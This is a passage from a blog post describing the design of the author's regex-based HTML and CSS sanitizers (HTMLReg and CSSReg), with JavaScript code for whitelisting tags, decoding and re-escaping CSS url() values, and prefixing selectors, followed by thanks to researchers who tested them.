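The whole pattern (parts chained into one grouped regex, a replace callback that only appends what it recognises, and a parse tree for debugging) can be shown end to end with a toy version. This sketch assumes much simpler parts than HTMLReg's (a made-up whitelist of b and i tags with no attributes, plus text nodes); sanitize is a hypothetical name. Anything the regex doesn't match, such as a stray ">", never reaches the output, and rejected tags are dropped rather than copied through.

```javascript
// Simplified, hypothetical parts; each becomes one capturing group, in order,
// so earlier parts win when several could match at the same position.
var parts = [
  /<\/?(?:b|i)>/,   // group 1: whitelisted tags without attributes
  /[^<>]+/,         // group 2: text nodes
  /<[^>]*>?/,       // group 3: any other tag-like sequence
];
var mainRegExp = new RegExp(
  parts.map(function (re) { return '(' + re.source + ')'; }).join('|'), 'gi');

function sanitize(html) {
  var output = '';
  var parseTree = '';
  // The return value of replace is ignored: only matched parts reach output.
  html.replace(mainRegExp, function ($0, $tag, $text, $invalidTag) {
    if ($tag !== undefined && $tag.length) {
      output += $tag;
      parseTree += 'tag(' + $tag + ')\n';
    } else if ($text !== undefined && $text.length) {
      output += $text;
      parseTree += 'text(' + $text + ')\n';
    } else {
      parseTree += 'invalid(' + $invalidTag + ')\n'; // dropped from output
    }
    return $0;
  });
  return { output: output, parseTree: parseTree };
}
```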

In the case of HTMLReg, for performance reasons, the main regex matches a general tag, which I then inspect further against the whitelist, so each check only runs over a smaller amount of text. You can see that in the following code:-

if($tag !== undefined && $tag.length) {
  if(!new RegExp('^<\\\/?'+allowedTags.source+'[\\s>]','i').test($tag)) {
    return '';
  }
  parseTree+='tag('+$tag+')\n';
  if(!/^<\/?[a-z0-9]+>$/i.test($tag)) {
    $tag = parseAttrValues($tag);
  }
  output += $tag;
}

Once my tag has been matched I start to parse its attributes. I do this by creating a hidden div and reading its contents. This is cool for a number of reasons: we can read what the browser reads, and our code automatically gets formatted. Because we then use the DOM, our entities will be decoded for us. While testing I found that JavaScript won't be executed via innerHTML without certain tags or attributes, so if I whitelist the tags and attributes I can use innerHTML safely without having to worry about execution. I have a backup plan if this fails: I could be more strict with certain attributes if it's possible to execute code.

On to CSSReg! It didn't exist at first, nor did I think it was needed, as I thought I could rely on the browser to ensure that a single CSS DOM rule couldn't cross over into multiple CSS rules. I was wrong. Many talented researchers (mentioned in the thanks section) proved that it wasn't possible to get browsers to rewrite CSS safely, so I had to write another regex sandbox. This time it wasn't as tricky as it first appeared. As long as I didn't try to follow the madness of the specification again, I should be able to produce CSS that was safe from malicious code yet useful enough to use.

First off, I gathered a list of properties and identifiers, and removed the crappy browser-specific extensions (yeah, they are bad. ALL OF THEM). Then I used the same method as HTMLReg to match each part; the trickiest part this time was URLs. There are so many ways to escape a CSS url in every browser: you have to handle backslash escapes, entities, new lines and backslash hex escapes. The best way I came up with was to whitelist the url first, match everything in between the parentheses, and then decode it and escape every character that didn't match the whitelist.
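The decode-then-escape approach for url() values can be sketched as follows. This is a minimal illustration, not CSSReg's code, and it rests on several assumptions: it only handles CSS backslash escapes (hex escapes with one optional trailing whitespace character, escaped newlines, and escaped literal characters), not HTML entities; the set of characters allowed unescaped is made up; and the scheme check (only http(s) or scheme-less URLs) stands in for the URL whitelist.

```javascript
// Decode CSS backslash escapes: \HEX (1-6 hex digits plus one optional
// whitespace character), escaped newlines (removed) and \X for anything else.
function decodeCssEscapes(value) {
  return value.replace(/\\(?:([0-9a-f]{1,6})[ \t\n\r\f]?|(\r\n|[\n\r\f])|([\s\S]))/gi,
    function ($0, hex, newline, ch) {
      if (hex !== undefined) {
        var code = parseInt(hex, 16);
        // Null, surrogates and out-of-range values become U+FFFD, as in CSS.
        if (code === 0 || (code >= 0xd800 && code <= 0xdfff) || code > 0x10ffff) code = 0xfffd;
        return String.fromCodePoint(code);
      }
      if (newline !== undefined) return '';
      return ch;
    });
}

// Assumed whitelist of characters allowed to appear unescaped in a URL.
var URL_SAFE = /[A-Za-z0-9\/.:_~?=&%#+-]/;

// Decode first, check the scheme on the decoded value, then re-escape every
// character outside the whitelist as \HEX plus a space, so the browser sees
// exactly one level of encoding. Returns null for rejected URLs.
function sandboxCssUrl(raw) {
  var decoded = decodeCssEscapes(raw.trim().replace(/^(['"])(.*)\1$/, '$2'));
  // A ":" before any "/", "?" or "#" means a scheme; only http(s) is allowed.
  if (/^[^\/?#]*:/.test(decoded) && !/^https?:/i.test(decoded)) return null;
  var out = '';
  for (var ch of decoded) {
    out += URL_SAFE.test(ch) ? ch : '\\' + ch.codePointAt(0).toString(16) + ' ';
  }
  return 'url("' + out + '")';
}
```

Checking the scheme only after decoding is the important part: an escaped value like \6a avascript: looks harmless before decoding but is javascript: afterwards.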

This made it pretty safe across multiple browsers. But there was a problem: some browsers decoded the CSS even when it was sandboxed correctly. For example, one attack I found was to triple-encode a character, and the browser would decode the entities and escapes until it produced its own mangled version of the CSS, which broke the sandbox. To get round this I created a custom attribute, "sandbox-style", which isn't in my whitelist; this allowed CSSReg to store its correctly sandboxed style, and because the attribute is outside the whitelist, nobody can inject a sandbox-style attribute of their own. Once my CSS was stored correctly I could then match it again and rename it back to style, which was then returned correctly.

All this trouble was because I wanted the browser to handle invalid HTML for me: any unclosed HTML tags would be closed automatically by the browser engine :)

Finally, in order to handle selectors I stuck to very simple syntax, either #someid or .someclass, and allowed multiples like .someclass1, .someclass2 {}. This prevents CSS injection based attacks as well as making the selectors easy to parse. Once each selector is matched, I restrict which tags are allowed and prefix an application ID to prevent HTML/CSS crossing between sandboxes. I then check whether a selector has been matched before opening or closing one.
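The selector rule can be sketched as a whitelist check plus a prefix. This is a minimal sketch under assumptions: the post doesn't say exactly how the application ID is attached, so here it is prepended to each id/class name, and the matching HTML would need the same prefix applied to its id and class attributes. sandboxSelectors and the app42_ ID are hypothetical.

```javascript
// Only bare #id or .class selectors, optionally comma-separated.
var SIMPLE_SELECTOR = /^([#.])(-?[A-Za-z_][\w-]*)$/;

function sandboxSelectors(selectorText, appID) {
  return selectorText.split(',').map(function (part) {
    var m = SIMPLE_SELECTOR.exec(part.trim());
    if (!m) throw new Error('Selector not allowed: ' + part.trim());
    // Prefix the name so one app's CSS can't target another app's elements.
    return m[1] + appID + m[2];
  }).join(', ');
}
```

For example, sandboxSelectors('.someclass1, .someclass2', 'app42_') gives '.app42_someclass1, .app42_someclass2', while element, descendant or attribute selectors are rejected outright.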

I hope you've enjoyed this post. It's a break from what I normally do, but I thought it was worth the effort to put together, as I've found some of these concepts to be the best way to code a solution, and hopefully you'll find them useful.

Thanks

I would like to thank Dave Ross, as I was heavily inspired by him, especially with the multiple regex references chained together. Eduardo Vela aka "sirdarckcat" for his awesome (?:HTML|JS|CSS)Reg hacks. Juriy Zaytsev aka "kangax" for his excellent input in detecting parsing flaws with JSReg. Kyo for breaking things without even trying. Theharmonyguy for breaking HTMLReg classes and spotting comical spelling mistakes by me. LeverOne for breaking HTMLReg and CSSReg with some quite simply awesome and evil vectors. Mario Heiderich aka ".mario" for making regex objects look insane, providing great input for JSReg and breaking HTMLReg. David Lindsay aka "Thornmaker" for finding JSReg parsing errors with ternary operators. Stefano Di Paola for smashing the JSReg stack and proving that non-mortals exist. Achim Hoffmann for providing valuable JSReg input, and everyone else who has helped me test and develop JSReg & others.

[1] JSReg
[2] HTMLReg
[3] CSSReg